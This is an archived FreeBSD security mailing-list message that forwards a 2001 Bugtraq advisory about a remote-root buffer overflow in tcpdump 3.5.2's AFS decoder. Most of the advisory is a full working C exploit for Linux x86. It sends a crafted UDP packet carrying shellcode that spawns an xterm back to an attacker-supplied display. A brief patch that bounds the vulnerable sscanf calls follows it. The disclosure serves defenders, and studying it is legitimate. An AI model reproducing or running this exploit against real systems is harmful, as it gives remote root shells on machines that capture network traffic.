From owner-freebsd-security  Fri Jan 12 12:59:11 2001
Delivered-To: freebsd-security@freebsd.org
Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44])
	by hub.freebsd.org (Postfix) with ESMTP id 8AC9037B400
	for <freebsd-security@freebsd.org>; Fri, 12 Jan 2001 12:58:46 -0800 (PST)
Received: (from daemon@localhost)
	by point.osg.gov.bc.ca (8.8.7/8.8.8) id MAA19604
	for <freebsd-security@freebsd.org>; Fri, 12 Jan 2001 12:58:44 -0800
Received: from passer.osg.gov.bc.ca(142.32.110.29)
 via SMTP by point.osg.gov.bc.ca, id smtpda19602; Fri Jan 12 12:58:36 2001
Received: (from uucp@localhost)
	by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f0CKwVR35233
	for <freebsd-security@freebsd.org>; Fri, 12 Jan 2001 12:58:31 -0800 (PST)
Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com"
 via SMTP by passer9.cwsent.com, id smtpdd35231; Fri Jan 12 12:58:07 2001
Received: (from uucp@localhost)
	by cwsys.cwsent.com (8.11.2/8.9.1) id f0CKw7I11863
	for <freebsd-security@freebsd.org>; Fri, 12 Jan 2001 12:58:07 -0800 (PST)
Message-Id: <200101122058.f0CKw7I11863@cwsys.cwsent.com>
Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys"
 via SMTP by localhost.cwsent.com, id smtpdD11859; Fri Jan 12 12:57:58 2001
X-Mailer: exmh version 2.2 06/23/2000 with nmh-1.0.4
Reply-To: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca>
X-OS: FreeBSD 4.2-RELEASE
X-Sender: cy
To: freebsd-security@freebsd.org
Subject: [!H] Tcpdump 3.5.2 remote root vulnerability (fwd)
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Fri, 12 Jan 2001 12:57:57 -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

This affects our tcpdump.


Regards,                         Phone:  (250)387-8437
Cy Schubert                        Fax:  (250)387-5766
Team Leader, Sun/Alpha Team   Internet:  Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC            


------- Forwarded Message

Return-Path: cschuber@osg.gov.bc.ca
Delivery-Date: Fri Jan 12 10:49:05 2001
Received: (from uucp@localhost)
	by cwsys.cwsent.com (8.11.2/8.9.1) id f0CIn4B11064
	for <cy@cwsys9.cwsent.com>; Fri, 12 Jan 2001 10:49:04 -0800 (PST)
Received: from passer9.cwsent.com(10.2.2.2), claiming to be 
"passer.osg.gov.bc.ca"
 via SMTP by cwsys9.cwsent.com, id smtpdO11060; Fri Jan 12 10:48:31 2001
Received: (from uucp@localhost)
	by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f0CImU234456
	for <cy>; Fri, 12 Jan 2001 10:48:30 -0800 (PST)
Resent-Message-Id: <200101121848.f0CImU234456@passer.osg.gov.bc.ca>
Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be 
"passer.osg.gov.bc.ca"
 via SMTP by localhost.osg.gov.bc.ca, id smtpdx34448; Fri Jan 12 
10:47:30 2001
Delivery-Date: Fri, 12 Jan 2001 10:47:29 -0800
Received: (from uucp@localhost)
	by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f0CIlTR34440
	for <cschuber@passer.osg.gov.bc.ca>; Fri, 12 Jan 2001 10:47:29 -0800 
(PST)
Received: from point.osg.gov.bc.ca(142.32.102.44)
 via SMTP by passer.osg.gov.bc.ca, id smtpdb34428; Fri Jan 12 10:46:40 
2001
Received: (from daemon@localhost)
	by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA19236
	for <cschuber@UUMAIL.GOV.BC.CA>; Fri, 12 Jan 2001 10:46:40 -0800
Received: from lists.securityfocus.com(207.126.127.68)
 via SMTP by point.osg.gov.bc.ca, id smtpda19234; Fri Jan 12 10:46:39 
2001
Received: from lists.securityfocus.com (lists.securityfocus.com 
[207.126.127.68])
	by lists.securityfocus.com (Postfix) with ESMTP
	id 0F19D24DE6E; Fri, 12 Jan 2001 09:15:32 -0800 (PST)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
          (LISTSERV-TCP/IP release 1.8d) with spool id 22555790 for
          BUGTRAQ@LISTS.SECURITYFOCUS.COM; Fri, 12 Jan 2001 09:13:21 
-0800
Approved-By: beng@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Received: from securityfocus.com (mail.securityfocus.com 
[207.126.127.78]) by
          lists.securityfocus.com (Postfix) with SMTP id 953F524C417 for
          <bugtraq@lists.securityfocus.com>; Thu, 11 Jan 2001 01:33:09 
-0800
          (PST)
Received: (qmail 21309 invoked by alias); 11 Jan 2001 09:33:12 -0000
Delivered-To: bugtraq@securityfocus.com
Received: (qmail 21266 invoked from network); 11 Jan 2001 09:33:08 -0000
Received: from unknown (HELO piscis.s21sec.com) (194.30.50.158) by
          mail.securityfocus.com with SMTP; 11 Jan 2001 09:33:08 -0000
Received: from localhost (unix [127.0.0.1]) by piscis.s21sec.com 
(8.9.3/8.9.3)
          with ESMTP id KAA01382 for <bugtraq@securityfocus.com>; Thu, 
11 Jan
          2001 10:36:06 +0100
X-Sender: zhodiac@piscis.s21sec.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0101111032250.1200-100000@piscis.s21sec.com>
Date: Thu, 11 Jan 2001 10:36:06 +0100
Reply-To: Zhodiac <zhodiac@OUTLIMIT.ORG>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Zhodiac <zhodiac@OUTLIMIT.ORG>
Subject: [!H] Tcpdump 3.5.2 remote root vulnerability
To: BUGTRAQ@SECURITYFOCUS.COM
Resent-To: cy@passer.osg.gov.bc.ca
Resent-Date: Fri, 12 Jan 2001 10:47:30 -0800
Resent-From: Cy Schubert <cschuber@osg.gov.bc.ca>

                          !Hispahack Research Team
                          ------------------------

    Program: Tcpdump 3.5 (3.4, 3.6.* and the CVS version are not 
vulnerable)
    Platform: *nix, Windoze
    Risk: Remote root access
    Author: Zhodiac <zhodiac@softhome.net>
    Date: 4/1/2001



    - Problem:
    -----------

        Tcpdump is a network packet analizer, capabel to decode sucj
   protocols as X11, radius, smb,... When decoding one of this protocols
   AFS exists a buffer overflow. Xploiting this bug an attacker can 
obtain
   remote root access to the server. This buffer overflow only happens
   when decoding all the packet, and it decodes all the packet when the
   snaplen (option -s in command line) is bigger than 500.

        This bug exists on the stable version of tcpdump (3.5.2), 
exists a
   patch of kris@freebsd.org (27/Sep/2000) in the cvs, but never used 
with
   the stable version. Developers were contacted and they released 3.6.1
   with this bug fixed.

   - Exploit:
   ----------

       For proof of vulnerability we release the Linux x86 xploit. But 
be
   aware, no public xploit for your system does not mean you can't be
   hacked. Vulnerability exists, fix it!

   ------- tcpdump-xploit.c ----------

   /*
    * Tcpdump remote root xploit (3.5.2) (with -s 500 or higher)
    * for Linux x86
    *
    * By: Zhodiac <zhodiac@softhome.net>
    *
    * !Hispahack Research Team
    * http://hispahack.ccc.de
    *
    * This xploit was coded only to prove it can be done :)
    *
    * As usual, this xploit is dedicated to [CrAsH]]
    * She is "the one" and "only one" :***************
    *
    * #include <standar/disclaimer.h>
    *
    * Madrid 2/1/2001
    *
    * Spain r0x
    *
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    #define ADDR			0xbffff248
    #define OFFSET			0
    #define NUM_ADDR			10
    #define NOP				0x90
    #define NUM_NOP			100

    #define RX_CLIENT_INITIATED     1
    #define RX_PACKET_TYPE_DATA     1
    #define FS_RX_DPORT             7000
    #define FS_RX_SPORT             7001
    #define AFS_CALL                134

    struct rx_header {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;
        u_int32_t serial;
        u_char type;
        u_char flags;
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    char shellcode[] = /* By Zhodiac <zhodiac@softhome.net> */
      "\xeb\x57\x5e\xb3\x21\xfe\xcb\x88\x5e\x2c\x88\x5e\x23"
      "\x88\x5e\x1f\x31\xdb\x88\x5e\x07\x46\x46\x88\x5e\x08"
      "\x4e\x4e\x88\x5e\xFF\x89\x5e\xfc\x89\x76\xf0\x8d\x5e"
      "\x08\x89\x5e\xf4\x83\xc3\x03\x89\x5e\xf8\x8d\x4e\xf0"
      "\x89\xf3\x8d\x56\xfc\x31\xc0\xb0\x0e\x48\x48\x48\xcd"
      "\x80\x31\xc0\x40\x31\xdb\xcd\x80\xAA\xAA\xAA\xAA\xBB"
      "\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xDD\xDD\xDD\xDD\xe8\xa4"
      "\xff\xff\xff"
      "/bin/shZ-cZ/usr/X11R6/bin/xtermZ-utZ-displayZ";

    long resolve(char *name) {
     struct hostent *hp;
     long ip;

     if ((ip=inet_addr(name))==-1) {
       if ((hp=gethostbyname(name))==NULL) {
            fprintf (stderr,"Can't resolve host name [%s].\n",name);
            exit(-1);
          }
        memcpy(&ip,(hp->h_addr),4);
        }
     return(ip);
    }


    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;


      fprintf(stderr,"\n!Hispahack Research Team (http://hispahack.ccc.d
e)\n");
      fprintf(stderr,"Tcpdump 3.5.2 xploit by Zhodiac 
<zhodiac@softhome.net>\n\n");


      if (argc<3) {
        printf("Usage: %s <host> <display> [offset]\n",argv[0]);
        exit(-1);
        }

      if (argc==4) offset=atoi(argv[3]);
      return_addr+=offset;

      fprintf(stderr,"Using return addr: %#x\n",return_addr);

      addr.sin_family=AF_INET;
      addr.sin_addr.s_addr=resolve(argv[1]);
      addr.sin_port=htons(FS_RX_DPORT);

      if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0) {
         perror("socket()");
         exit(-1);
         }

      sin.sin_family=AF_INET;
      sin.sin_addr.s_addr=INADDR_ANY;
      sin.sin_port=htons(FS_RX_SPORT);

      if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
          perror("bind()");
          exit(-1);
          }

      memset(buffer,0,sizeof(buffer));
      rxh=(struct rx_header *)buffer;

      rxh->type=RX_PACKET_TYPE_DATA;
      rxh->seq=htonl(1);
      rxh->flags=RX_CLIENT_INITIATED;

      lptr=(long int *)(buffer+sizeof(struct rx_header));
      *(lptr++)=htonl(AFS_CALL);
      *(lptr++)=htonl(1);
      *(lptr++)=htonl(2);
      *(lptr++)=htonl(3);

      *(lptr++)=htonl(420);
      chptr=(char *)lptr;
      sprintf(chptr,"1 0\n");
      chptr+=4;

      memset(chptr,'A',120);
      chptr+=120;
      lptr=(long int *)chptr;
      for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
      chptr=(char *)lptr;
      memset(chptr,NOP,NUM_NOP);
      chptr+=NUM_NOP;
      shellcode[30]=(char)(46+strlen(argv[2]));
      memcpy(chptr,shellcode,strlen(shellcode));
      chptr+=strlen(shellcode);
      memcpy(chptr,argv[2],strlen(argv[2]));
      chptr+=strlen(argv[2]);

      sprintf(chptr," 1\n");

      if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1) {
         perror("send()");
         exit(-1);
         }

      fprintf(stderr,"Packet with Overflow sent, now wait for the 
xterm!!!! :)\n\n");

      close(sock);
      return(0);
     }

   ------- tcpdump-xploit.c ----------



   - Fix:
   ------

      Best solution is to wait for a new patched version (3.6.1), 
meanwhile
  here you have a patch that will stop this attack (be aware that this
  patch was not done after a total revision of the code, maybe there are
  some other overflows).

   ------ print-rx.patch ---------

   950c950
   <               if (sscanf((char *) s, "%s %d\n%n", user, &acl, &n) 
!=2)
   ---
   >               if (sscanf((char *) s, "%127s %d\n%n", user, &acl, 
&n) !=2)
   963c963
   <               if (sscanf((char *) s, "%s %d\n%n", user, &acl, &n) 
!= 2)
   ---
   >               if (sscanf((char *) s, "%127s %d\n%n", user, &acl, 
&n) != 2)

   ------ print-rx.patch ---------

   piscis:~# patch print-rx.c < print-rx.patch
   patching file `print-rx.c'
   piscis:~#

   Spain r0x

   Greets :)

   Zhodiac

------- End of Forwarded Message





To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message